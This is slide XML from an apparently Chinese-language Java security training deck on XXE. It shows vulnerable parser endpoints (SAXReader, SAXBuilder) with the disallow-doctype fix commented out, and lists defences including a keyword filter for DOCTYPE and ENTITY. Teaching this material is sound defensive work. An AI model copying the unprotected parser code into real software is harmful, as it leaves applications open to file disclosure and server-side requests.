              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>factory.newDocumentBuilder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Shape 238">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28018F64-E2D9-90B2-1D40-22D6869D0596}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466132" y="400308"/>
            <a:ext cx="99372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可能造成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的组件及修复方式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="592670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CE9307-BFD7-2535-AF1D-799C964A51F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1943100" y="2610118"/>
            <a:ext cx="20497800" cy="8710077"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t> 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>SAXReader</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>SAXReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t> sax = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>SAXReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>修复：禁用外部实体</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sax.setFeature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("http://apache.org/xml/features/disallow-doctype-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>decl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>", true);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>sax.read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>(new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>InputSource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>(new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>StringReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>(content)));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>@RequestMapping(value = "/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>SAXBuilder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>public String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>SAXBuilder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>(@RequestBody String content) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>    try {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SAXBuilder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>saxbuilder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SAXBuilder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>修复</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>saxbuilder.setFeature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("http://apache.org/xml/features/disallow-doctype-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>decl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>", true);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>saxbuilder.build</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>(new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>InputSource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>(new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>StringReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>(content)));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>        return "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>SAXBuilder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t> XXE";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>    } catch (Exception e) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>        return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>e.toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Shape 238">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDBF9248-9913-6F34-452C-7A48FF3D7075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466132" y="400308"/>
            <a:ext cx="99372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可能造成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的组件及修复方式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16018672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漏洞方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B26BF521-100F-25D9-1E64-75CDF8D35C01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466132" y="2267217"/>
            <a:ext cx="21248094" cy="8279190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>防范措施：</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禁用实体解析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>禁用或限制解析外部实体，可以通过禁用相关的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解析器特性或设置安全的解析选项来实现。大部分的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解析器默认对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击是脆弱的。因此，最好的解决办法就是配置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解析器去使用本地静态的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，不允许</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中含有任何自己声明的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>开发语言提供的禁用外部实体的方法：</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输入验证和过滤</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对于接收用户输入的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据，进行严格的输入验证和过滤，确保只接受可信的输入，过滤掉恶意的实体引用。过滤关键字：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;!DOCTYPE&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;!ENTITY&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SYSTEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PUBLIC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>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使用安全的解析器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>选择使用安全的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解析器，如在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JAXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中的安全解析器，可以提供更强的安全性和防御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞的能力。</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最小权限原则</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>确保应用程序在解析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>时以最小的权限执行，避免不必要的文件系统或网络访问权限。</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强化服务器配置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对服务器进行配置调优，禁用或限制不必要的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解析器功能，减少攻击面。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38561538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7483041" y="4572627"/>
            <a:ext cx="9417920"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谢谢观看！</a:t>
            </a:r>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85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Web</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>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XXE</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="75000"/>
                      </a:schemeClr>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207933367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2798814" y="1072484"/>
            <a:ext cx="5918348" cy="1413616"/>
            <a:chOff x="-1" y="133127"/>
            <a:chExt cx="5918347" cy="1413614"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="76" name="Group 184"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-1" y="133127"/>
              <a:ext cx="5918347" cy="1122683"/>
              <a:chOff x="-1" y="133128"/>
              <a:chExt cx="5918347"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4023855"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solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Sql</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>注入漏洞原理</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2811076" y="7395316"/>
            <a:ext cx="8713986" cy="1413616"/>
            <a:chOff x="-1" y="133127"/>
            <a:chExt cx="8713986" cy="1413614"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="66" name="Group 196"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-1" y="133127"/>
              <a:ext cx="8713986" cy="1046436"/>
              <a:chOff x="-1" y="133128"/>
              <a:chExt cx="8713986" cy="1046434"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="68"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4</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="69" name="Shape 194"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1894491" y="294360"/>
                <a:ext cx="681949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Java</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>常用数据库框架</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
